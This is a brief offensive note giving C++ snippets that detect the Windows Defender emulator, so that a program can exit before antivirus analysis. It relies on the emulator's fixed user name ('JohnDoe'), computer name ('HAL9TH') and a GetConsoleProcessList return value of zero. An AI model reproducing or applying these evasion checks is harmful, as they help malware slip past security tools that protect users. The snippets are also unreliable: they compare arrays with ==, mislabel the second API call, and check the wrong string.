- Some Defender Emulator bypasses
- All code examples are in c++, I don't care for any other language.
The emulated version of GetUserName returns a static string of "JohnDoe".
You can bypass it with:
CHAR user[MAX_USERNAME_SIZE];
GetUserNameA((LPSTR)user, MAX_USERNAME_SIZE);
if(user == "JohnDoe"){
ExitProcess(-1);// Emulated, unless actual username is JohnDoe
}
Since the username could actually be JohnDoe, it might be worth adding an extra check.
The emulated version of GetUserName returns a static string of "HAL9TH".
CHAR user[MAX_USERNAME_SIZE];
GetComputerName((LPSTR)user, MAX_USERNAME_SIZE);
if(user == "JohnDoe"){
ExitProcess(-1);
}
The emulated version of GetConsoleProcessList simply returns 0, https://docs.microsoft.com/en-us/windows/console/getconsoleprocesslist states that "If the return value is zero, the function has failed, because every console has at least one process associated with it.".
if(GetConsoleProcessList(5, 5) == 0){
// could be emulated.
}